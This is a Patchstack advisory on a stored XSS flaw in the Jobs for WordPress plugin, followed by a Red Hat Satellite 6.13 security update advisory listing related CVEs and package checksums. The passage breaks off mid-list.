Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in BlueGlass Jobs for WordPress plugin <= 2.5.10.2 versions.

**Solution**

Update the WordPress Jobs for WordPress plugin to the latest available version (at least 2.5.11).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Jobs for WordPress Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.5.11.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-26017: WordPress Jobs for WordPress plugin <= 2.5.10.2 - Cross Site Scripting (XSS) - Patchstack

An update is now available for Red Hat Satellite 6.13. The release contains a
new version of Satellite and important security fixes for various components.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-1471: A flaw was found in the SnakeYaml package. This flaw allows an attacker to benefit from remote code execution by sending malicious YAML content and this content being deserialized by the constructor. Deserialization is unsafe and leads to Remote Code Execution (RCE).
* CVE-2022-22577: A flaw was found in rubygem-actionpack where CSP headers were sent with responses that Rails considered "HTML" responses. This flaw allows an attacker to leave API requests without CSP headers and perform a Cross-site scripting attack.
* CVE-2022-23514: An inefficient regular expression vulnerability was found in rubygem loofah. While sanitizing certain SVG attributes, loofah is susceptible to excessive backtracking, which can result in a denial of service through CPU resource consumption.
* CVE-2022-23515: A Cross-site scripting vulnerability was found in rubygem loofah. While neutralizing certain data URIs, loofah is susceptible to Cross-site scripting attacks.
* CVE-2022-23516: An uncontrolled recursion vulnerability was found in rubygem loofah. While sanitizing certain sections, loofah is susceptible to stack exhaustion, which can result in a denial of service through CPU resource consumption.
* CVE-2022-23517: An inefficient Regular Expression vulnerability was found in rubygem rails-html-sanitizer. Certain configurations are susceptible to excessive backtracking, leading to a denial of service through CPU resource consumption.
* CVE-2022-23518: A Cross-site scripting vulnerability was found in rails-html-sanitizer. When used in combination with Loofah since version 2.1.0, improper neutralization of data URIs may allow Cross-site scripting.
* CVE-2022-23519: A Cross-site scripting vulnerability was found in rails-html-sanitizer. Certain configurations of rails-html-sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags.
* CVE-2022-23520: A Cross-site scripting vulnerability was found in rails-html-sanitizer. Certain configurations of rails-html-sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags.
* CVE-2022-25857: A flaw was found in the org.yaml.snakeyaml package. This flaw allows an attacker to cause a denial of service (DoS) due to missing nested depth limitation for collections.
* CVE-2022-27777: A flaw was found in rubygem-actionview when untrusted data such as the hash key for tag attributes are not properly escaped. This flaw allows an attacker to perform a Cross-site scripting attack.
* CVE-2022-31163: A flaw was found in rubygem-tzinfo. When using the Timezone.get function, it fails to validate time zone identifiers correctly, allowing a new line character input within the identifier. This flaw allows an attacker to use the new line character and write any code, which will be executed within the Ruby process.
* CVE-2022-32224: An insecure deserialization flaw was found in Active Record, which uses YAML.unsafe_load to convert the YAML data into Ruby objects. An attacker supplying crafted data to the database can perform remote code execution (RCE), resulting in complete system compromise.
* CVE-2022-33980: A flaw was found in Apache Commons Configuration's variable interpolation, which by default included several lookup actions that could permit script invocation on remote servers. This issue could allow an attacker to use one of these actions to send a request to execute arbitrary code on the server.
* CVE-2022-38749: A flaw was found in the snakeyaml package due to a stack-overflow in parsing YAML files. By persuading a victim to open a specially-crafted file, a remote attacker could cause the application to crash, resulting in a denial of service.
* CVE-2022-38750: A flaw was found in the snakeyaml package due to a stack-overflow in parsing YAML files. By persuading a victim to open a specially-crafted file, a remote attacker could cause the application to crash.
* CVE-2022-38751: A flaw was found in the snakeyaml package due to a stack-overflow in parsing YAML files. By persuading a victim to open a specially-crafted file, a remote attacker could cause the application to crash.
* CVE-2022-38752: A flaw was found in the snakeyaml package due to a stack-overflow in parsing YAML files. By persuading a victim to open a specially-crafted file, a remote attacker could cause the application to crash.
* CVE-2022-41323: A denial of service flaw was discovered in Django. This issue occurs when incorrectly handling certain internationalized URLs. A malicious attacker could use this issue to cause a crash, resulting in a denial of service.
* CVE-2022-41946: A flaw was found in org.postgresql. This issue allows the creation of a temporary file when using PreparedStatement.setText(int, InputStream) and PreparedStatemet.setBytea(int, InputStream). This could allow a user to create an unexpected file available to all users, which could end in unexpected behavior.
* CVE-2022-42003: A flaw was found in FasterXML jackson-databind. This issue could allow an attacker to benefit from resource exhaustion when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled due to unchecked primitive value deserializers to avoid deep wrapper array nesting.
* CVE-2022-42004: A flaw was found In FasterXML jackson-databind. This issue could allow an attacker to benefit from resource exhaustion due to the lack of a check in BeanDeserializer._deserializeFromArray to prevent the use of deeply nested arrays. An application is only vulnerable with certain customized choices for deserialization.
* CVE-2022-42889: A flaw was found in Apache Commons Text packages 1.5 through 1.9.  The affected versions allow an attacker to benefit from a variable interpolation process contained in Apache Commons Text, which can cause properties to be dynamically defined. Server applications are vulnerable to remote code execution (RCE) and unintentional contact with untrusted remote servers.
* CVE-2023-23969: A flaw was found in python-django. The parsed values of the Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial of service vector via excessive memory usage if large header values are sent.
* CVE-2023-24580: A memory exhaustion flaw was found in the python-django package. This issue occurs when passing certain inputs, leading to a system crash and denial of service.


SRPM foreman-3.5.1.14-1.el8sat.src.rpm SHA-256: 96cbc7f935dfe20163fe7a5f6c8e4d8dda24d2cedac5ba1f43fd3f5d259acb09 python-pulp\_manifest-3.0.0-3.el8pc.src.rpm SHA-256: 4111b6f4ae8f2c16b665494080e49d6622f6addc68029a4beca00160f8341441 rubygem-amazing\_print-1.4.0-1.el8sat.src.rpm SHA-256: 99b3d5d1a277eebfa260b147e94b8240535317f096fdf820ce51d2133239989b rubygem-apipie-bindings-0.6.0-1.el8sat.src.rpm SHA-256: cea4a1e4ee7f0fb95862e5c58be3640b318bc3e2559b84411aa33e233b576c6e rubygem-clamp-1.1.2-7.el8sat.src.rpm SHA-256: 2dfb5edcf0b3de53aa8270b285d593f1de794d78a7637925499aa709e297a570 rubygem-domain\_name-0.5.20190701-1.el8sat.src.rpm SHA-256: 1d38ec0fd080ab3055287a3c6334f773bb380d01a8b6418275d49c45c1f53e25 rubygem-fast\_gettext-1.8.0-1.el8sat.src.rpm SHA-256: 9416cdacb31f93c0d7e1390986e1185a5ba1c8153840b591750d3a2e967c9f88 rubygem-ffi-1.15.5-1.el8sat.src.rpm SHA-256: c7bc5e33e7bca67dabe3bfd75ea0f4087d4124fed0a6b596787ccd93fd916d7d rubygem-foreman\_maintain-1.2.8-1.el8sat.src.rpm SHA-256: 77c2d4f4a95b3b25fc706777a975d6a57547f8adae3451f473fd0b54e2719f5e rubygem-gssapi-1.3.1-1.el8sat.src.rpm SHA-256: 69cc0c4c3bf350910f40d3ed12fbe8d3c354de18907f9cbac827ee697c5e301f rubygem-hammer\_cli-3.5.1-1.el8sat.src.rpm SHA-256: 6d4878e54b1d7a082e80109426810030d90f2d7743786d3d6e423e0042c886e4 rubygem-hammer\_cli\_foreman-3.5.1-1.el8sat.src.rpm SHA-256: 71046fa62484cc5f4dfac3bc2012f67459725fac94d7e6f5fc184a6f3c9a02c5 rubygem-hammer\_cli\_foreman\_admin-1.1.0-1.el8sat.src.rpm SHA-256: 07bc02a20c65f1a390c94fa14fc1a21f1b595d6a59bc4b85820dfbf6a4004bad rubygem-hammer\_cli\_foreman\_ansible-0.4.0-2.el8sat.src.rpm SHA-256: ce17bc9ee3a2b305fa93a426f239ee8453c64bf4ec41e20cc8e0893c65581beb rubygem-hammer\_cli\_foreman\_azure\_rm-0.2.2-1.el8sat.src.rpm SHA-256: 9ffa3403b0836fd0e42240eb816bd989fa92eb693e7b6baf5d3cd00e45df2a09 rubygem-hammer\_cli\_foreman\_bootdisk-0.3.0-3.el8sat.src.rpm SHA-256: 1ffe867e41557d0f221423cc181247b0d9ecaf291184e921428d5d3505c1f586 rubygem-hammer\_cli\_foreman\_discovery-1.1.0-1.el8sat.src.rpm SHA-256: 204e8249c7296d8f2962bc6b049d046ad6c8522a324e977c9fec7e53c2798ad3 rubygem-hammer\_cli\_foreman\_google-1.0.0-1.el8sat.src.rpm SHA-256: e0ac1708e444478975f01cd49707a546bafd27c2ad064d72465f32cc6de1ec1e rubygem-hammer\_cli\_foreman\_openscap-0.1.13-2.el8sat.src.rpm SHA-256: f390054ee03e08cce519fef6593731794fbe403f958844850864f7a744f3aa26 rubygem-hammer\_cli\_foreman\_remote\_execution-0.2.2-1.el8sat.src.rpm SHA-256: 736d5480dbc14960305050f77fee2bfca634333434513ff91ff2c02341f20b32 rubygem-hammer\_cli\_foreman\_tasks-0.0.18-1.el8sat.src.rpm SHA-256: 3067943adb30da76495eee177fe4a1152e01e5622b339727a4ea5dbe8d57c4ce rubygem-hammer\_cli\_foreman\_templates-0.2.0-3.el8sat.src.rpm SHA-256: e05324da60e1f116b35af559e6b293f189a0fdbf6f3346f9652a9031be8a8cb1 rubygem-hammer\_cli\_foreman\_virt\_who\_configure-0.0.9-2.el8sat.src.rpm SHA-256: 6f490c05c6358d3c92b55f161680291a76e4ed3df92305c13e94bc0aa9eddec0 rubygem-hammer\_cli\_foreman\_webhooks-0.0.4-1.el8sat.src.rpm SHA-256: 0ab83db8ef7cf729649533c31da888c02f9d8aae2f5cd5c8f1b212f80340ce57 rubygem-hammer\_cli\_katello-1.7.3-1.el8sat.src.rpm SHA-256: a1ecbe3f5a920e1701d0effc4a750a66911795cfe824e1ff9b9aae26578b26bc rubygem-hashie-5.0.0-1.el8sat.src.rpm SHA-256: 4a22e4e0a3d2ca42196db38706932c4423424d0481da1ef55a69ecfdca0b5845 rubygem-highline-2.0.3-2.el8sat.src.rpm SHA-256: baa0722843988940ee290c077b24a781f68e334c6ba2d01bbc29e37d4e616e11 rubygem-http-accept-1.7.0-1.el8sat.src.rpm SHA-256: 254cd5011f684976b286b46f7e9155528122cefebff7da92da9a668162af2210 rubygem-http-cookie-1.0.5-1.el8sat.src.rpm SHA-256: 4790a522c77d42de1613516b5def33b777dd2a6542e5380ec324ec8a4d4736f4 rubygem-jwt-2.5.0-1.el8sat.src.rpm SHA-256: 927600376f724dfa78b0fba0c9a2019950b8390c58f1d1bde4ce39152c509fbe rubygem-little-plugger-1.1.4-3.el8sat.src.rpm SHA-256: 0befaf99ad517a9e3f8f0c3f57537308546fefffb923cf0120ee91f8cc563436 rubygem-locale-2.1.3-1.el8sat.src.rpm SHA-256: 464592bccd9b84f474786e44f40e38bf19c4b97606229bb972d5560e36b0e82d rubygem-logging-2.3.1-1.el8sat.src.rpm SHA-256: 7eff8ee8027dc41da115a84ed7a387f6f203732646c66757193741f40722829b rubygem-mime-types-3.4.1-1.el8sat.src.rpm SHA-256: 85fb02b8876c1257d985410fb52e61557fe5a47a807373725c3222ed55980572 rubygem-mime-types-data-3.2022.0105-1.el8sat.src.rpm SHA-256: 8b49a5a43007fb28ca031ab3dbebe65b7a52ec2aab81329494c2858f6b54be9e rubygem-multi\_json-1.15.0-1.el8sat.src.rpm SHA-256: 290814a9f63b992343f04b5ba61431da93d3f0af7f178bd46ea75383e10791d0 rubygem-netrc-0.11.0-6.el8sat.src.rpm SHA-256: df020aafc3dbea6783e451f01920fe443010d0692ed0c8b91f81fd9e8df19054 rubygem-oauth-1.1.0-1.el8sat.src.rpm SHA-256: 054f95b9064abaa5f097bbee60696b1bcba76862f2f835b395645deda82929d4 rubygem-oauth-tty-1.0.5-1.el8sat.src.rpm SHA-256: 67608e216e40c7204781eab7e658de154e55af23f9afaaac1e0dfa421b77b7e3 rubygem-powerbar-2.0.1-3.el8sat.src.rpm SHA-256: 50a2df34ba5e350d1c1f4c7a921a80921b5a1db61dfcb725945e265845b11ee2 rubygem-rest-client-2.1.0-1.el8sat.src.rpm SHA-256: a8a9b8ed15924707cb9be534fba5dba544c3161fc758341ab303e1fa90bc018f rubygem-snaky\_hash-2.0.1-1.el8sat.src.rpm SHA-256: da5802f0139518e3fdcc46332fdf514d37843bf26d0516a42216054610e4d026 rubygem-unf-0.1.4-1.el8sat.src.rpm SHA-256: b09ddde678ed196f0a5524e60f0347ff30384253d3407f9022ef3874919504a1 rubygem-unf\_ext-0.0.8.2-1.el8sat.src.rpm SHA-256: 661f973049cbf0916f6054467231e8a78094d6395f0973bab6f7a76627176d74 rubygem-unicode-0.4.4.4-4.1.el8sat.src.rpm SHA-256: 1cfd4c14934a59e2d7a8545579a72d5d10370f91c9bd4253816fe5aef26bb432 rubygem-unicode-display\_width-1.8.0-1.el8sat.src.rpm SHA-256: e2f72ff2aa77e68185e01ce3b0af7fee132a281facfa05be2057a52382a33ccb rubygem-version\_gem-1.1.1-1.el8sat.src.rpm SHA-256: 3f8f9459a00250678e26affc4f7d17a47e5fac34f28766970fb8213473c424f2 satellite-6.13.0-6.el8sat.src.rpm SHA-256: 308c0489c794aeef1d788b769c6d3c9b5c68ee8d7b2ada2943e2d5f9c705e0d7 satellite-clone-3.3.0-1.el8sat.src.rpm SHA-256: 1f2461d4ee7e67da1371d5a87037970a999e1b6baa8088b5b8bd4803d3ad518f satellite-maintain-0.0.1-1.el8sat.src.rpm SHA-256: d4407202a99e2648c03d7dfb91b6e30ac3d939060814897ec6121469758a35e8 x86\_64 foreman-cli-3.5.1.14-1.el8sat.noarch.rpm SHA-256: 84991aa7b9e9cc56f1ebab3d84420c80732c30326041b53bc397917a8f673071 foreman-cli-3.5.1.14-1.el8sat.noarch.rpm SHA-256: 84991aa7b9e9cc56f1ebab3d84420c80732c30326041b53bc397917a8f673071 python39-pulp\_manifest-3.0.0-3.el8pc.noarch.rpm SHA-256: e8b900443fa6bba84e490bcf100d96f81019dc974e2759154b6f24099eac3625 python39-pulp\_manifest-3.0.0-3.el8pc.noarch.rpm SHA-256: e8b900443fa6bba84e490bcf100d96f81019dc974e2759154b6f24099eac3625 rubygem-amazing\_print-1.4.0-1.el8sat.noarch.rpm SHA-256: 28564b2a01c3f8299b6d3806a6c810dda738f57b4478411e9a106f9a82f248b6 rubygem-amazing\_print-1.4.0-1.el8sat.noarch.rpm SHA-256: 28564b2a01c3f8299b6d3806a6c810dda738f57b4478411e9a106f9a82f248b6 rubygem-apipie-bindings-0.6.0-1.el8sat.noarch.rpm SHA-256: 53cbfa5873f5d3478d7acf009a872e5fd103e3848781b2626e5784c8b5ba650f rubygem-apipie-bindings-0.6.0-1.el8sat.noarch.rpm SHA-256: 53cbfa5873f5d3478d7acf009a872e5fd103e3848781b2626e5784c8b5ba650f rubygem-clamp-1.1.2-7.el8sat.noarch.rpm SHA-256: 72ee49dba461a8875254e2f386c84630fd5e3a431a3acc053e57a4480538a224 rubygem-clamp-1.1.2-7.el8sat.noarch.rpm SHA-256: 72ee49dba461a8875254e2f386c84630fd5e3a431a3acc053e57a4480538a224 rubygem-clamp-1.1.2-7.el8sat.noarch.rpm SHA-256: 72ee49dba461a8875254e2f386c84630fd5e3a431a3acc053e57a4480538a224 rubygem-domain\_name-0.5.20190701-1.el8sat.noarch.rpm SHA-256: 3f0b2fc0d825bda8a6e626a51dcd09bed84c13d5493b367a752c14bad1d086c3 rubygem-domain\_name-0.5.20190701-1.el8sat.noarch.rpm SHA-256: 3f0b2fc0d825bda8a6e626a51dcd09bed84c13d5493b367a752c14bad1d086c3 rubygem-fast\_gettext-1.8.0-1.el8sat.noarch.rpm SHA-256: 791af6d5051b4ae03aeba4f3d63c103e61a293aee0932c313baa5ecd20676330 rubygem-fast\_gettext-1.8.0-1.el8sat.noarch.rpm SHA-256: 791af6d5051b4ae03aeba4f3d63c103e61a293aee0932c313baa5ecd20676330 rubygem-ffi-1.15.5-1.el8sat.x86\_64.rpm SHA-256: d89b99970f73277fb5088dae20fe916e45fcfd9c29be4aa67114ec6c38f3f00c rubygem-ffi-1.15.5-1.el8sat.x86\_64.rpm SHA-256: d89b99970f73277fb5088dae20fe916e45fcfd9c29be4aa67114ec6c38f3f00c rubygem-ffi-debuginfo-1.15.5-1.el8sat.x86\_64.rpm SHA-256: ee61515ef5003d86cd17397f89e9c6b5cea0018ae66f924eb418761c26cb636d rubygem-ffi-debugsource-1.15.5-1.el8sat.x86\_64.rpm SHA-256: 1347c975ade274b4cc6466d18e0eb2f8af2b1b87cc000776bc638c42462e2dbd rubygem-foreman\_maintain-1.2.8-1.el8sat.noarch.rpm SHA-256: 39bc0b1ae86aa6841e5389ff7f3bbdc6bc030675feda572f5274188da80edb78 rubygem-gssapi-1.3.1-1.el8sat.noarch.rpm SHA-256: 8e7d71e0551fb7873cc06e3799e8b29349c8bcaccc24ed492f8c0caa3f43da41 rubygem-gssapi-1.3.1-1.el8sat.noarch.rpm SHA-256: 8e7d71e0551fb7873cc06e3799e8b29349c8bcaccc24ed492f8c0caa3f43da41 rubygem-hammer\_cli-3.5.1-1.el8sat.noarch.rpm SHA-256: 16093fecfb7bf57d1424cc334c4935afb600b0e6b636c89f6363acb85e777b4c rubygem-hammer\_cli-3.5.1-1.el8sat.noarch.rpm SHA-256: 16093fecfb7bf57d1424cc334c4935afb600b0e6b636c89f6363acb85e777b4c rubygem-hammer\_cli\_foreman-3.5.1-1.el8sat.noarch.rpm SHA-256: f3d87069675e3aabea9272e07c7af6779b53bdf29e9d8ac502d930e3f3bb22e2 rubygem-hammer\_cli\_foreman-3.5.1-1.el8sat.noarch.rpm SHA-256: f3d87069675e3aabea9272e07c7af6779b53bdf29e9d8ac502d930e3f3bb22e2 rubygem-hammer\_cli\_foreman\_admin-1.1.0-1.el8sat.noarch.rpm SHA-256: aef981b46ec4a75f08616a2db6e32491832b27a2a5be833f73ce8cf639335d82 rubygem-hammer\_cli\_foreman\_admin-1.1.0-1.el8sat.noarch.rpm SHA-256: aef981b46ec4a75f08616a2db6e32491832b27a2a5be833f73ce8cf639335d82 rubygem-hammer\_cli\_foreman\_ansible-0.4.0-2.el8sat.noarch.rpm SHA-256: de95eaa522482cf008b04d1dc9bbab93511fd879362707ba9c6e734718c01e85 rubygem-hammer\_cli\_foreman\_ansible-0.4.0-2.el8sat.noarch.rpm SHA-256: de95eaa522482cf008b04d1dc9bbab93511fd879362707ba9c6e734718c01e85 rubygem-hammer\_cli\_foreman\_azure\_rm-0.2.2-1.el8sat.noarch.rpm SHA-256: 711420d0e49134743f51f7d26b0d0d8dc4534cdee5b66339d2cf631380862c68 rubygem-hammer\_cli\_foreman\_azure\_rm-0.2.2-1.el8sat.noarch.rpm SHA-256: 711420d0e49134743f51f7d26b0d0d8dc4534cdee5b66339d2cf631380862c68 rubygem-hammer\_cli\_foreman\_bootdisk-0.3.0-3.el8sat.noarch.rpm SHA-256: 95133b727619e1189ed2fe84eb8d4af73eb82e47025d5ae5305ecf4539643e6b rubygem-hammer\_cli\_foreman\_bootdisk-0.3.0-3.el8sat.noarch.rpm SHA-256: 95133b727619e1189ed2fe84eb8d4af73eb82e47025d5ae5305ecf4539643e6b rubygem-hammer\_cli\_foreman\_discovery-1.1.0-1.el8sat.noarch.rpm SHA-256: 03baafd4f163eb945e66029c8b7419d9e1374d445599f8cf80292fe75333f155 rubygem-hammer\_cli\_foreman\_discovery-1.1.0-1.el8sat.noarch.rpm SHA-256: 03baafd4f163eb945e66029c8b7419d9e1374d445599f8cf80292fe75333f155 rubygem-hammer\_cli\_foreman\_google-1.0.0-1.el8sat.noarch.rpm SHA-256: d17289e2c12aa0b72fc74a1edea6ccbe4bb00805257396145dc59d197c133c6f rubygem-hammer\_cli\_foreman\_google-1.0.0-1.el8sat.noarch.rpm SHA-256: d17289e2c12aa0b72fc74a1edea6ccbe4bb00805257396145dc59d197c133c6f rubygem-hammer\_cli\_foreman\_openscap-0.1.13-2.el8sat.noarch.rpm SHA-256: fda262b6661ba3625b0c88084fd9270da76682ae2a2e81ad9e7a86546aff7a58 rubygem-hammer\_cli\_foreman\_openscap-0.1.13-2.el8sat.noarch.rpm SHA-256: fda262b6661ba3625b0c88084fd9270da76682ae2a2e81ad9e7a86546aff7a58 rubygem-hammer\_cli\_foreman\_remote\_execution-0.2.2-1.el8sat.noarch.rpm SHA-256: e01a8e07ab642d5cd45763b4018d6503ea98b941891750ed6daa28b4f09f6906 rubygem-hammer\_cli\_foreman\_remote\_execution-0.2.2-1.el8sat.noarch.rpm SHA-256: e01a8e07ab642d5cd45763b4018d6503ea98b941891750ed6daa28b4f09f6906 rubygem-hammer\_cli\_foreman\_tasks-0.0.18-1.el8sat.noarch.rpm SHA-256: 9e748c5f4950ad8618c0ff79790cbc8816d4f5cefe4cdb02d1ad58592a85c77e rubygem-hammer\_cli\_foreman\_tasks-0.0.18-1.el8sat.noarch.rpm SHA-256: 9e748c5f4950ad8618c0ff79790cbc8816d4f5cefe4cdb02d1ad58592a85c77e rubygem-hammer\_cli\_foreman\_templates-0.2.0-3.el8sat.noarch.rpm SHA-256: 0311ff246ef1e3f0c184694d2c8f77dd1fed9eaebb5bfdd709ada48bdf3cfedc rubygem-hammer\_cli\_foreman\_templates-0.2.0-3.el8sat.noarch.rpm SHA-256: 0311ff246ef1e3f0c184694d2c8f77dd1fed9eaebb5bfdd709ada48bdf3cfedc rubygem-hammer\_cli\_foreman\_virt\_who\_configure-0.0.9-2.el8sat.noarch.rpm SHA-256: 1399930146dad96b62ff50c08ff34401d14c72741c7c9dcdc65e47578a78faf1 rubygem-hammer\_cli\_foreman\_virt\_who\_configure-0.0.9-2.el8sat.noarch.rpm SHA-256: 1399930146dad96b62ff50c08ff34401d14c72741c7c9dcdc65e47578a78faf1 rubygem-hammer\_cli\_foreman\_webhooks-0.0.4-1.el8sat.noarch.rpm SHA-256: 22bcbe23cd21370ce714d87337a8f7ce8fc80a45259d0f4ad53cc91372ba3c30 rubygem-hammer\_cli\_foreman\_webhooks-0.0.4-1.el8sat.noarch.rpm SHA-256: 22bcbe23cd21370ce714d87337a8f7ce8fc80a45259d0f4ad53cc91372ba3c30 rubygem-hammer\_cli\_katello-1.7.3-1.el8sat.noarch.rpm SHA-256: fc90d02dab31df43c2ccc8c45cca43c1f8d7afd5cd855f554de3f98a4536bf02 rubygem-hammer\_cli\_katello-1.7.3-1.el8sat.noarch.rpm SHA-256: fc90d02dab31df43c2ccc8c45cca43c1f8d7afd5cd855f554de3f98a4536bf02 rubygem-hashie-5.0.0-1.el8sat.noarch.rpm SHA-256: 0a62928f3a1dcc86e48693e4ab1a79522d114f0054e056755b4adf7257a70312 rubygem-hashie-5.0.0-1.el8sat.noarch.rpm SHA-256: 0a62928f3a1dcc86e48693e4ab1a79522d114f0054e056755b4adf7257a70312 rubygem-highline-2.0.3-2.el8sat.noarch.rpm SHA-256: dbda456ba5eeaf527bfcdf339664a04714a01c9c8c261d517bf012e1a8995c08 rubygem-highline-2.0.3-2.el8sat.noarch.rpm SHA-256: dbda456ba5eeaf527bfcdf339664a04714a01c9c8c261d517bf012e1a8995c08 rubygem-highline-2.0.3-2.el8sat.noarch.rpm SHA-256: dbda456ba5eeaf527bfcdf339664a04714a01c9c8c261d517bf012e1a8995c08 rubygem-http-accept-1.7.0-1.el8sat.noarch.rpm SHA-256: 6ea74c56621c5bf879e8e54190bdadd940aa61dc20a9a5ae97b7de325c2d7d1b rubygem-http-accept-1.7.0-1.el8sat.noarch.rpm SHA-256: 6ea74c56621c5bf879e8e54190bdadd940aa61dc20a9a5ae97b7de325c2d7d1b rubygem-http-cookie-1.0.5-1.el8sat.noarch.rpm SHA-256: 12204c9fe342ca04d3d2b6056ee3fdb50ad32529dab912fd163a8d52139762ae rubygem-http-cookie-1.0.5-1.el8sat.noarch.rpm SHA-256: 12204c9fe342ca04d3d2b6056ee3fdb50ad32529dab912fd163a8d52139762ae rubygem-jwt-2.5.0-1.el8sat.noarch.rpm SHA-256: 3c0ac8e9ce0cdfc38fb4ae0a52b1fec347602b43df5364afb63e810ad2192c3a rubygem-jwt-2.5.0-1.el8sat.noarch.rpm SHA-256: 3c0ac8e9ce0cdfc38fb4ae0a52b1fec347602b43df5364afb63e810ad2192c3a rubygem-little-plugger-1.1.4-3.el8sat.noarch.rpm SHA-256: b6889db91218858108da8cd87370dce4d3648ba1233fe7275b1f9896c3ab896c rubygem-little-plugger-1.1.4-3.el8sat.noarch.rpm SHA-256: b6889db91218858108da8cd87370dce4d3648ba1233fe7275b1f9896c3ab896c rubygem-locale-2.1.3-1.el8sat.noarch.rpm SHA-256: 75c150f038038a0bbd65808a1e68d920ca35b750c0a1248ce2c57c22f718e322 rubygem-locale-2.1.3-1.el8sat.noarch.rpm SHA-256: 75c150f038038a0bbd65808a1e68d920ca35b750c0a1248ce2c57c22f718e322 rubygem-logging-2.3.1-1.el8sat.noarch.rpm SHA-256: 06f215300c3fa70d2120910c5d6473df3db036615af2713f4d44c41c6cb96894 rubygem-logging-2.3.1-1.el8sat.noarch.rpm SHA-256: 06f215300c3fa70d2120910c5d6473df3db036615af2713f4d44c41c6cb96894 rubygem-mime-types-3.4.1-1.el8sat.noarch.rpm SHA-256: 2a11bec2c2e12b8dca0f7e98f0ac6e3ad3368b70a8af5ab3525465fd51168fef rubygem-mime-types-3.4.1-1.el8sat.noarch.rpm SHA-256: 2a11bec2c2e12b8dca0f7e98f0ac6e3ad3368b70a8af5ab3525465fd51168fef rubygem-mime-types-data-3.2022.0105-1.el8sat.noarch.rpm SHA-256: 16aee51305560dfa939a006e5fc4de7b4b5a9d57ce1e3e1a25806dd1954cd5c5 rubygem-mime-types-data-3.2022.0105-1.el8sat.noarch.rpm SHA-256: 16aee51305560dfa939a006e5fc4de7b4b5a9d57ce1e3e1a25806dd1954cd5c5 rubygem-multi\_json-1.15.0-1.el8sat.noarch.rpm SHA-256: a51b030a6f074905deac6a37c93e885392d1299e6beb48177b227c44507756a5 rubygem-multi\_json-1.15.0-1.el8sat.noarch.rpm SHA-256: a51b030a6f074905deac6a37c93e885392d1299e6beb48177b227c44507756a5 rubygem-netrc-0.11.0-6.el8sat.noarch.rpm SHA-256: 165d3af736a7ad71a882d346bae13291962f00d27fc84673a543b5e60c26d5c8 rubygem-netrc-0.11.0-6.el8sat.noarch.rpm SHA-256: 165d3af736a7ad71a882d346bae13291962f00d27fc84673a543b5e60c26d5c8 rubygem-oauth-1.1.0-1.el8sat.noarch.rpm SHA-256: 9cdac270281740431c5deeca636e955e4d4816716c08fa8afe07149b24e6cde8 rubygem-oauth-1.1.0-1.el8sat.noarch.rpm SHA-256: 9cdac270281740431c5deeca636e955e4d4816716c08fa8afe07149b24e6cde8 rubygem-oauth-tty-1.0.5-1.el8sat.noarch.rpm SHA-256: 64c23237a1a1967bf16b3ef719cba8df0fb2d26768767ec540597be610bf3601 rubygem-oauth-tty-1.0.5-1.el8sat.noarch.rpm SHA-256: 64c23237a1a1967bf16b3ef719cba8df0fb2d26768767ec540597be610bf3601 rubygem-powerbar-2.0.1-3.el8sat.noarch.rpm SHA-256: 429b4eed2f1ca2606b929c8234810dca2a36317d93b25bee47f548678369dd09 rubygem-powerbar-2.0.1-3.el8sat.noarch.rpm SHA-256: 429b4eed2f1ca2606b929c8234810dca2a36317d93b25bee47f548678369dd09 rubygem-rest-client-2.1.0-1.el8sat.noarch.rpm SHA-256: 31a58851de71808ca8e8dbcbd2f226b169926374bcff623b029c1eb60f67da05 rubygem-rest-client-2.1.0-1.el8sat.noarch.rpm SHA-256: 31a58851de71808ca8e8dbcbd2f226b169926374bcff623b029c1eb60f67da05 rubygem-snaky\_hash-2.0.1-1.el8sat.noarch.rpm SHA-256: c043f90d4684e444eb505a1e9c5b86350c7722bc7ac6d6863d6a12456a0215ae rubygem-snaky\_hash-2.0.1-1.el8sat.noarch.rpm SHA-256: c043f90d4684e444eb505a1e9c5b86350c7722bc7ac6d6863d6a12456a0215ae rubygem-unf-0.1.4-1.el8sat.noarch.rpm SHA-256: 6982c393c9c932d574b7c0d4b364d641e89be8e076d44560831befc6581eef89 rubygem-unf-0.1.4-1.el8sat.noarch.rpm SHA-256: 6982c393c9c932d574b7c0d4b364d641e89be8e076d44560831befc6581eef89 rubygem-unf\_ext-0.0.8.2-1.el8sat.x86\_64.rpm SHA-256: cb6a1e0f238047d6d3dcfc7d311207cd97f3f6a79d42821720f9c30d1d43273d rubygem-unf\_ext-0.0.8.2-1.el8sat.x86\_64.rpm SHA-256: cb6a1e0f238047d6d3dcfc7d311207cd97f3f6a79d42821720f9c30d1d43273d rubygem-unf\_ext-debuginfo-0.0.8.2-1.el8sat.x86\_64.rpm SHA-256: 9b76e097e7817f36b8fdbde4d56f5b8fff960570130f918768085d1e98634469 rubygem-unf\_ext-debugsource-0.0.8.2-1.el8sat.x86\_64.rpm SHA-256: 90a5c43dec2980289a29428d600bab555a60f7fb23cabda7b75a3565580a9857 rubygem-unicode-0.4.4.4-4.1.el8sat.x86\_64.rpm SHA-256: 5e7533c687dd953506bb68a1bfd541a0de5f148a7d7201f4e724f78bb126ffe5 rubygem-unicode-0.4.4.4-4.1.el8sat.x86\_64.rpm SHA-256: 5e7533c687dd953506bb68a1bfd541a0de5f148a7d7201f4e724f78bb126ffe5 rubygem-unicode-debuginfo-0.4.4.4-4.1.el8sat.x86\_64.rpm SHA-256: 1493cf52715a5975bfb3aab1b573f1b3dd8f6b23bb451384b1ab048362008d18 rubygem-unicode-debugsource-0.4.4.4-4.1.el8sat.x86\_64.rpm SHA-256: 0908080af8eafdd7f9a1de490bb444b42b6738dff1e99f29e590578dd2a02b0b rubygem-unicode-display\_width-1.8.0-1.el8sat.noarch.rpm SHA-256: 